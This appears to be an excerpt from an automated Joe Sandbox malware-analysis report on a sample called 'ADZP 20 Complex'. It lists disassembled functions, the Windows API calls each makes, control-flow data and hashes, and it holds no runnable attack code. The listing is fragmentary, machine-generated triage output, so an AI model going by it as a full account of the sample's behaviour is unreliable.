                    • API String ID: 2497967046-0
                    • Opcode ID: 3c4de4927df5d1280fe3f97ef1b5d41f3313172c187ce59835a5c327154ebcf4
                    • Instruction ID: 56fdceb44a62e96a78129ec9cee9786d08dacee7710f0624d62ab86a2b9feb41
                    • Opcode Fuzzy Hash: 3c4de4927df5d1280fe3f97ef1b5d41f3313172c187ce59835a5c327154ebcf4
                    • Instruction Fuzzy Hash: 6011E974600208FFCB04CF99D894E9ABBB6FF88314F20C569E8099B354D734AA41DB94
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0040AD45 Relevance: 4.5, APIs: 3, Instructions: 41COMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 881 40ad45-40ad52 882 40ad54-40ad86 wcsncpy wcslen 881->882 883 40adbd 881->883 885 40ad9e-40ada6 882->885 884 40adbf-40adc2 883->884 886 40ad88-40ad8f 885->886 887 40ada8-40adbb CreateDirectoryW 885->887 888 40ad91-40ad94 886->888 889 40ad9b 886->889 887->884 888->889 890 40ad96-40ad99 888->890 889->885 890->887 890->889
                    APIs
                    Memory Dump Source
                    • Source File: 0000001E.00000002.3238807984.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 0000001E.00000002.3238392053.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000001E.00000002.3238894702.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000001E.00000002.3239106452.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000001E.00000002.3239151888.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_30_2_400000_ADZP 20 Complex.jbxd
                    Similarity
                    • API ID: CreateDirectorywcslenwcsncpy
                    • String ID:
                    • API String ID: 961886536-0
                    • Opcode ID: d6c445466f8a19e48a25e4a2068d10de2bbe29753fac2d082d2e760440aa5e2b
                    • Instruction ID: 2d24f661812d06aabf4acf2af4a599dd38efaf3f9e777f7594d650cf82d0c1de
                    • Opcode Fuzzy Hash: d6c445466f8a19e48a25e4a2068d10de2bbe29753fac2d082d2e760440aa5e2b
                    • Instruction Fuzzy Hash: 9A01DBB0401318D6CB65DB64CC89AFE7379DF04301F6046BBE815E25D1E7389AA4DB4A
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00408DEE Relevance: 4.5, APIs: 3, Instructions: 20COMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 891 408dee-408e26 memset InitCommonControlsEx CoInitialize
                    APIs
                    • memset.MSVCRT ref: 00408DFB
                    • InitCommonControlsEx.COMCTL32(00000008,00001000), ref: 00408E15
                    • CoInitialize.OLE32(00000000), ref: 00408E1D
                    Memory Dump Source
                    • Source File: 0000001E.00000002.3238807984.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 0000001E.00000002.3238392053.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000001E.00000002.3238894702.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000001E.00000002.3239106452.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000001E.00000002.3239151888.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_30_2_400000_ADZP 20 Complex.jbxd
                    Similarity
                    • API ID: CommonControlsInitInitializememset
                    • String ID:
                    • API String ID: 2179856907-0
                    • Opcode ID: d861f93e929e8b2be3fa0307ea6de5ff81dc4c61bc6e7fbf8c72a90690fa8d51
                    • Instruction ID: 955719fea0046c6293a44e32614ed026eb147d3324017d94785fb64326744d49
                    • Opcode Fuzzy Hash: d861f93e929e8b2be3fa0307ea6de5ff81dc4c61bc6e7fbf8c72a90690fa8d51
                    • Instruction Fuzzy Hash: FDE08CB088430CBBEB009BD0EC0EF8DBB7CEB00315F4041A4F904A2280EBB466488B95
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0040B440 Relevance: 3.1, APIs: 2, Instructions: 65memoryfileCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 0040DB18: EnterCriticalSection.KERNEL32(00000020,00000000,?,00000000,0040B455,00000000,?,?,00000000,00403350,00000000,00000000,00000000,00000000,?,00000000), ref: 0040DB23
                      • Part of subcall function 0040DB18: LeaveCriticalSection.KERNEL32(00000020,?,00000000,0040B455,00000000,?,?,00000000,00403350,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0040DB9E
                    • CreateFileW.KERNELBASE(00000000,80000000,00000000,00000000,00000003,00000080,00000000,?,00000000,?,?,00000000,00403350,00000000,00000000,00000000), ref: 0040B473
                    • HeapAlloc.KERNEL32(00000000,00001000,?,00000000,?,?,00000000,00403350,00000000,00000000,00000000,00000000,?,00000000,00000000,00000800), ref: 0040B495
                    Memory Dump Source
                    • Source File: 0000001E.00000002.3238807984.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 0000001E.00000002.3238392053.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000001E.00000002.3238894702.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000001E.00000002.3239106452.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000001E.00000002.3239151888.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_30_2_400000_ADZP 20 Complex.jbxd
                    Similarity
                    • API ID: CriticalSection$AllocCreateEnterFileHeapLeave
                    • String ID:
                    • API String ID: 3705299215-0
                    • Opcode ID: 770ca6dcf0c78f014627849ec7c08e1bba775e026bf20b1c3eb2924782468709
                    • Instruction ID: 11d32f41a61cd8df30a66e4113f3bfff31ba723ad3a0b0249673477e2beeffa2
                    • Opcode Fuzzy Hash: 770ca6dcf0c78f014627849ec7c08e1bba775e026bf20b1c3eb2924782468709
                    • Instruction Fuzzy Hash: 62119371200304ABC2305F1ADC44B57BBF8EBC5764F14823EF565A37E1C77599158BA8
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0040E266 Relevance: 3.1, APIs: 2, Instructions: 61memoryCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 0040E3B9: HeapFree.KERNEL32(00000000,-00000018,00000200,00000000,0040E277,00000200,?,?,?,0040112D,0000000C,000186A1,00000007,00417074,004180F0,00000004), ref: 0040E3FA
                    • RtlAllocateHeap.NTDLL(00000000,FFFFFFDD,?,00000200,?,?,?,0040112D,0000000C,000186A1,00000007,00417074,004180F0,00000004,00000000,00417064), ref: 0040E296
                    • memset.MSVCRT ref: 0040E2D1
                    Memory Dump Source
                    • Source File: 0000001E.00000002.3238807984.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 0000001E.00000002.3238392053.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000001E.00000002.3238894702.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000001E.00000002.3239106452.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000001E.00000002.3239151888.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_30_2_400000_ADZP 20 Complex.jbxd
                    Similarity
                    • API ID: Heap$AllocateFreememset
                    • String ID:
                    • API String ID: 2774703448-0
                    • Opcode ID: e4601c40af4f90fd6d7b6dc76b08f4e14a7cbeae79d3d170558c75ed44b030ef
                    • Instruction ID: 6d5d9c53e9755405ffb3e8ab18b4b48e318f9db4ecaa07005482283559b0ef73
                    • Opcode Fuzzy Hash: e4601c40af4f90fd6d7b6dc76b08f4e14a7cbeae79d3d170558c75ed44b030ef
                    • Instruction Fuzzy Hash: 5D117F72504314ABC320DF0AD944A4BBBE8EF88710F01492EF988A7351D774ED108BA5
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0040B050 Relevance: 3.0, APIs: 2, Instructions: 31memoryCOMMON
                    Download Yara Rule
                    APIs
                    • HeapFree.KERNEL32(00000000,?,00000000,00000000,?,?,00403394,00000000,00000000,00000800,00000000,00000000,00000000,00000000,?,00000000), ref: 0040B093
                    • FindCloseChangeNotification.KERNELBASE(00000000,00000000,?,?,00403394,00000000,00000000,00000800,00000000,00000000,00000000,00000000,?,00000000,00000000,00000800), ref: 0040B09B
                    Memory Dump Source
                    • Source File: 0000001E.00000002.3238807984.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 0000001E.00000002.3238392053.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000001E.00000002.3238894702.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000001E.00000002.3239106452.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000001E.00000002.3239151888.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_30_2_400000_ADZP 20 Complex.jbxd
                    Similarity
                    • API ID: ChangeCloseFindFreeHeapNotification
                    • String ID:
                    • API String ID: 1642550653-0
                    • Opcode ID: bcdd82019f876fc489b22f42e5959096ccfe265fa7cf8be21467e7666472b7d6
                    • Instruction ID: 7abf06afc9ef833db34d05f69b67e4dbbe1385027aa9b24abf0250c41048a97e
                    • Opcode Fuzzy Hash: bcdd82019f876fc489b22f42e5959096ccfe265fa7cf8be21467e7666472b7d6
                    • Instruction Fuzzy Hash: 1AF08C32505110ABC6322B6AEC09E8BBA72EF81724F148A3FF125314F4CB794850DF9C
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0040E780 Relevance: 3.0, APIs: 2, Instructions: 30memoryCOMMON
                    Download Yara Rule
                    APIs
                    • wcslen.MSVCRT ref: 0040E78E
                    • RtlAllocateHeap.NTDLL(020A0000,00000000,?,?,00000000,00000000), ref: 0040E7A9
                    Memory Dump Source
                    • Source File: 0000001E.00000002.3238807984.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 0000001E.00000002.3238392053.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000001E.00000002.3238894702.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000001E.00000002.3239106452.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000001E.00000002.3239151888.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_30_2_400000_ADZP 20 Complex.jbxd
                    Similarity
                    • API ID: AllocateHeapwcslen
                    • String ID:
                    • API String ID: 1345907364-0
                    • Opcode ID: 72c8991afff95364d9171c38dd98e6fe33221a3a1fadc299bdc7e95de95877d4
                    • Instruction ID: d40e0309548f3d2a4a525bb3e3ae8e28906eb34af4bb1b46d5d9fd1a2a98838f
                    • Opcode Fuzzy Hash: 72c8991afff95364d9171c38dd98e6fe33221a3a1fadc299bdc7e95de95877d4
                    • Instruction Fuzzy Hash: 83F05EB5600208FFCB04DFA5D880E9A77B9EB88718F10C46DF9088B390D635EA01CF94
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0040AE39 Relevance: 3.0, APIs: 2, Instructions: 12fileCOMMON
                    Download Yara Rule
                    APIs
                    • SetFileAttributesW.KERNEL32(00000002,00000080,0040AE72,020A9F70,00000000,00401FF0,00000000,-0000012C,00402366,00000000,?,00000000,00000001,00000000,00000000,00000000), ref: 0040AE50
                    • DeleteFileW.KERNELBASE(00000000,0040AE72,020A9F70,00000000,00401FF0,00000000,-0000012C,00402366,00000000,?,00000000,00000001,00000000,00000000,00000000,00000002), ref: 0040AE5A
                    Memory Dump Source
                    • Source File: 0000001E.00000002.3238807984.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 0000001E.00000002.3238392053.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000001E.00000002.3238894702.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000001E.00000002.3239106452.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000001E.00000002.3239151888.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_30_2_400000_ADZP 20 Complex.jbxd
                    Similarity
                    • API ID: File$AttributesDelete
                    • String ID:
                    • API String ID: 2910425767-0
                    • Opcode ID: 856d1dee773f9fe4b81d39230ef639874c988cfb4423ff7bdc63b5e612766022
                    • Instruction ID: 9bbbf45483326d305172a49cd8f3e34a401707f8027ad8c24340846d3084d85d
                    • Opcode Fuzzy Hash: 856d1dee773f9fe4b81d39230ef639874c988cfb4423ff7bdc63b5e612766022
                    • Instruction Fuzzy Hash: 36D09E30488300BBD7555B20DD0D75B7EA16F90745F08CC79B585610F1C7788C64EB4A
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0040E4D0 Relevance: 3.0, APIs: 2, Instructions: 12memoryCOMMON
                    Download Yara Rule
                    APIs
                    • HeapCreate.KERNELBASE(00000000,00001000,00000000,?,00401053,00000000,00001000,00000000,00000000), ref: 0040E4DC
                    • TlsAlloc.KERNEL32(?,00401053,00000000,00001000,00000000,00000000), ref: 0040E4E7
                      • Part of subcall function 0040ED40: HeapAlloc.KERNEL32(020A0000,00000000,0000000C,?,?,0040E4F7,?,00401053,00000000,00001000,00000000,00000000), ref: 0040ED4E
                      • Part of subcall function 0040ED40: HeapAlloc.KERNEL32(020A0000,00000000,00000010,?,?,0040E4F7,?,00401053,00000000,00001000,00000000,00000000), ref: 0040ED62
                      • Part of subcall function 0040ED40: TlsSetValue.KERNEL32(0000000D,00000000,?,?,0040E4F7,?,00401053,00000000,00001000,00000000,00000000), ref: 0040ED8B
                    Memory Dump Source
                    • Source File: 0000001E.00000002.3238807984.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 0000001E.00000002.3238392053.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000001E.00000002.3238894702.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000001E.00000002.3239106452.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000001E.00000002.3239151888.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_30_2_400000_ADZP 20 Complex.jbxd
                    Similarity
                    • API ID: AllocHeap$CreateValue
                    • String ID:
                    • API String ID: 493873155-0
                    • Opcode ID: db5b467741c0f00c93d1fd6ff26af59c18c3d1bccb059c91a176208ebbe690b4
                    • Instruction ID: 280f0189a1b64710240dfbe11500258ab370f1237584088fdcd0bc4150eb2939
                    • Opcode Fuzzy Hash: db5b467741c0f00c93d1fd6ff26af59c18c3d1bccb059c91a176208ebbe690b4
                    • Instruction Fuzzy Hash: F1D012705C83046BE7002BB2BC4A7843A78DB04751F20843AFA095B3D0DAB45480895D
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0040A330 Relevance: 2.6, APIs: 2, Instructions: 113COMMON
                    Download Yara Rule
                    APIs
                    • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,00000000,00403F00,00000001,00000002,00000000,00000000,00000000), ref: 0040A412
                    • MultiByteToWideChar.KERNEL32(00000001,00000000,00000000,00000000,00000000,00000001,00000000,00000000,?,?,?,00000000,00403F00,00000001,00000002,00000000), ref: 0040A432
                    Memory Dump Source
                    • Source File: 0000001E.00000002.3238807984.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 0000001E.00000002.3238392053.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000001E.00000002.3238894702.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000001E.00000002.3239106452.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000001E.00000002.3239151888.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_30_2_400000_ADZP 20 Complex.jbxd
                    Similarity
                    • API ID: ByteCharMultiWide
                    • String ID:
                    • API String ID: 626452242-0
                    • Opcode ID: a30fc8ce1e8d09fb33b6fb0615b8e378ebe935ed8b67f93c539b2d5397848702
                    • Instruction ID: fedc1c205319a766e10bd101b7b911e6f787ac623343fea3eb012fc010ddeeec
                    • Opcode Fuzzy Hash: a30fc8ce1e8d09fb33b6fb0615b8e378ebe935ed8b67f93c539b2d5397848702
                    • Instruction Fuzzy Hash: 0A3164361083056EC7349E799C80B7BB799EF80324F144B3FFEA1262C1D6789821976A
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00402BA6 Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 0040E660: TlsGetValue.KERNEL32(0000000D,?,00402EF9,00000000,00000000,00000000,00000000,?,0040118D,00000000,00000000,00000000,00000001,00000004,00000000,00417064), ref: 0040E677
                      • Part of subcall function 0040A220: RtlAllocateHeap.NTDLL(00000008,00000000,00402EAC,00000200,00000000,0000000A,00000000,00000000,00000000,00000000,00000000,00000000,004044FA,00000000,00000000,00000000), ref: 0040A231
                    • GetShortPathNameW.KERNEL32(020A9F70,020A9F70,00002710), ref: 00402BE0
                      • Part of subcall function 0040E520: GetLastError.KERNEL32(00001000,00000000,00000000), ref: 0040E526
                      • Part of subcall function 0040E520: TlsGetValue.KERNEL32(0000000D), ref: 0040E535
                      • Part of subcall function 0040E520: SetLastError.KERNEL32(?), ref: 0040E54B
                      • Part of subcall function 0040E560: TlsGetValue.KERNEL32(0000000D,00000000,00000000), ref: 0040E56C
                      • Part of subcall function 0040E560: RtlAllocateHeap.NTDLL(020A0000,00000000,?), ref: 0040E599
                      • Part of subcall function 0040A200: HeapFree.KERNEL32(00000000,00000000,00401B7C,00000000,00000000,?,00000000,00000000,00417024,00000000,00000000,?,00000000,?,00000000,00000000), ref: 0040A20C
                      • Part of subcall function 0040E6C0: wcslen.MSVCRT ref: 0040E6D7
                      • Part of subcall function 00405170: TlsGetValue.KERNEL32(?,?,00402F99,00000000,00000008,00000001,00000000,00000000,00000000,00000000,00000000,?,00000200,00000000,00000000,00000000), ref: 00405178
                      • Part of subcall function 0040E5F0: RtlFreeHeap.NTDLL(020A0000,00000000,00000000,?,00000000,?,00412484,00000000,00000000,-00000008), ref: 0040E608
                    Memory Dump Source
                    • Source File: 0000001E.00000002.3238807984.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 0000001E.00000002.3238392053.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000001E.00000002.3238894702.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000001E.00000002.3239106452.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000001E.00000002.3239151888.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_30_2_400000_ADZP 20 Complex.jbxd
                    Similarity
                    • API ID: HeapValue$AllocateErrorFreeLast$NamePathShortwcslen
                    • String ID:
                    • API String ID: 192546213-0
                    • Opcode ID: 4ffc8271a727788d72dbd82b9e7b130440edac90e55bf10bd88016aa18fcca3f
                    • Instruction ID: cfcced4fe20ace1cb9c77e507b1d6c1eac9b345b0de8df7ff04b6d7fabcc8d03
                    • Opcode Fuzzy Hash: 4ffc8271a727788d72dbd82b9e7b130440edac90e55bf10bd88016aa18fcca3f
                    • Instruction Fuzzy Hash: ED012975108205BAE501BB72DD06D3F7669EF80718F108C3EB444B50E2EA3D9C616A2E
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0040B0C0 Relevance: 1.5, APIs: 1, Instructions: 25fileCOMMON
                    Download Yara Rule
                    APIs
                    • WriteFile.KERNELBASE(00000000,?,?,00000000,00000000,00000000,?,0040B088,00000000,00000000,?,?,00403394,00000000,00000000,00000800), ref: 0040B0E7
                    Memory Dump Source
                    • Source File: 0000001E.00000002.3238807984.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 0000001E.00000002.3238392053.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000001E.00000002.3238894702.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000001E.00000002.3239106452.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000001E.00000002.3239151888.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_30_2_400000_ADZP 20 Complex.jbxd
                    Similarity
                    • API ID: FileWrite
                    • String ID:
                    • API String ID: 3934441357-0
                    • Opcode ID: c522352010aa0ffdeb1c8550a8e7d9d94415fd1ef62632f4db173a1ec829df8d
                    • Instruction ID: 9ab85608ef899c62796374e569d53c100cb89dcb0d5a9370bd5502097d7715ab
                    • Opcode Fuzzy Hash: c522352010aa0ffdeb1c8550a8e7d9d94415fd1ef62632f4db173a1ec829df8d
                    • Instruction Fuzzy Hash: F4F0F276104601AFD320CF58D808B87FBE8EB48321F00C82EE59AC2A50C730E810DB55
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00402B6D Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                    Download Yara Rule
                    APIs
                    • GetNativeSystemInfo.KERNEL32(00000000,?,00000000,00000000), ref: 00402B89
                    Memory Dump Source
                    • Source File: 0000001E.00000002.3238807984.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 0000001E.00000002.3238392053.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000001E.00000002.3238894702.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000001E.00000002.3239106452.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000001E.00000002.3239151888.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_30_2_400000_ADZP 20 Complex.jbxd
                    Similarity
                    • API ID: InfoNativeSystem
                    • String ID:
                    • API String ID: 1721193555-0
                    • Opcode ID: 700b71109f0c023e3e1c18d21fddf158996dc8241789cbbab02419d6e0a745b1
                    • Instruction ID: 9093739e4f63ff22c3e940b982bbbee8e150dd58fd9266ea6ee1473296d97692
                    • Opcode Fuzzy Hash: 700b71109f0c023e3e1c18d21fddf158996dc8241789cbbab02419d6e0a745b1
                    • Instruction Fuzzy Hash: EBD0C26041810846D710BE658509B9B73E8D700304F608C3AE084961C1F3FCE9D5821B
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0040E5F0 Relevance: 1.5, APIs: 1, Instructions: 16memoryCOMMON
                    Download Yara Rule
                    APIs
                    • RtlFreeHeap.NTDLL(020A0000,00000000,00000000,?,00000000,?,00412484,00000000,00000000,-00000008), ref: 0040E608
                    Memory Dump Source
                    • Source File: 0000001E.00000002.3238807984.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 0000001E.00000002.3238392053.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000001E.00000002.3238894702.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000001E.00000002.3239106452.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000001E.00000002.3239151888.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_30_2_400000_ADZP 20 Complex.jbxd
                    Similarity
                    • API ID: FreeHeap
                    • String ID:
                    • API String ID: 3298025750-0
                    • Opcode ID: 4a1186e03504991e415e8e092ef0052a0ef4c47318b2f6512a59703c6ea9925b
                    • Instruction ID: cd5ef850ad68aae2c27baef3402967596087f0f1f33355341870062cdd1dbcb2
                    • Opcode Fuzzy Hash: 4a1186e03504991e415e8e092ef0052a0ef4c47318b2f6512a59703c6ea9925b
                    • Instruction Fuzzy Hash: 4ED0C9B2144218BFE614DB96FC58FF7776CE794750F50C82AFA048A1D0CA769890CBA8
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0040A220 Relevance: 1.5, APIs: 1, Instructions: 10memoryCOMMON
                    Download Yara Rule
                    APIs
                    • RtlAllocateHeap.NTDLL(00000008,00000000,00402EAC,00000200,00000000,0000000A,00000000,00000000,00000000,00000000,00000000,00000000,004044FA,00000000,00000000,00000000), ref: 0040A231
                    Memory Dump Source
                    • Source File: 0000001E.00000002.3238807984.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 0000001E.00000002.3238392053.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000001E.00000002.3238894702.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000001E.00000002.3239106452.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000001E.00000002.3239151888.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_30_2_400000_ADZP 20 Complex.jbxd
                    Similarity
                    • API ID: AllocateHeap
                    • String ID:
                    • API String ID: 1279760036-0
                    • Opcode ID: c9295373328ff73b20fc6ca55934024a7e081ff9ecf7500422664bd763381941
                    • Instruction ID: b6192ce9428b1ba2f4eef992fd110c0ccadf60e3b61bfdacf1c665f796a5839f
                    • Opcode Fuzzy Hash: c9295373328ff73b20fc6ca55934024a7e081ff9ecf7500422664bd763381941
                    • Instruction Fuzzy Hash: 97C04C713442006AE6509B24DE09F5776A9BB70742F00C43A7545D11B4DA31D860D72D
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0040A1C0 Relevance: 1.5, APIs: 1, Instructions: 6memoryCOMMON
                    Download Yara Rule
                    APIs
                    • HeapCreate.KERNELBASE(00000000,00001000,00000000,0040106C,00000000,00001000,00000000,00000000), ref: 0040A1C9
                    Memory Dump Source
                    • Source File: 0000001E.00000002.3238807984.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 0000001E.00000002.3238392053.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000001E.00000002.3238894702.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000001E.00000002.3239106452.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000001E.00000002.3239151888.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_30_2_400000_ADZP 20 Complex.jbxd
                    Similarity
                    • API ID: CreateHeap
                    • String ID:
                    • API String ID: 10892065-0
                    • Opcode ID: 632f7ef1fd3851381c9f94796d2a32ace23046017034c32eb606c36269a48e04
                    • Instruction ID: 5a0dfe59a05c5f03c374f6d2b2c7d0e1199ed08054282bce4923ddabcda8d052
                    • Opcode Fuzzy Hash: 632f7ef1fd3851381c9f94796d2a32ace23046017034c32eb606c36269a48e04
                    • Instruction Fuzzy Hash: 10B012702C43005AF2500B209C0AB8039609304B43F304024B2015A1D4CAF01080852C
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Non-executed Functions

                    Function 00408F69 Relevance: 65.0, APIs: 32, Strings: 5, Instructions: 270windowregistrymemoryCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00408E58: wcslen.MSVCRT ref: 00408E64
                      • Part of subcall function 00408E58: HeapAlloc.KERNEL32(00000000,00000000,?,00408F81,?), ref: 00408E7A
                      • Part of subcall function 00408E58: wcscpy.MSVCRT ref: 00408E8B
                    • GetStockObject.GDI32(00000011), ref: 00408FB2
                    • LoadIconW.USER32 ref: 00408FE9
                    • LoadCursorW.USER32(00000000,00007F00), ref: 00408FF9
                    • RegisterClassExW.USER32 ref: 00409021
                    • IsWindowEnabled.USER32(00000000), ref: 00409048
                    • EnableWindow.USER32(00000000), ref: 00409059
                    • GetSystemMetrics.USER32(00000001), ref: 00409091
                    • GetSystemMetrics.USER32(00000000), ref: 0040909E
                    • CreateWindowExW.USER32(00000000,00000000,10C80000,-00000096,?,?,?,?,?), ref: 004090BF
                    • SetWindowLongW.USER32(00000000,000000EB,?), ref: 004090D3
                    • CreateWindowExW.USER32(00000000,STATIC,?,5000000B,0000000A,0000000A,00000118,00000016,00000000,00000000,00000000), ref: 00409101
                    • SendMessageW.USER32(00000000,00000030,00000001), ref: 00409119
                    • CreateWindowExW.USER32(00000200,EDIT,00000000,00000000,0000000A,00000020,00000113,00000015,00000000,0000000A,00000000), ref: 00409157
                    • SendMessageW.USER32(00000000,00000030,00000001), ref: 00409169
                    • SetFocus.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00409171
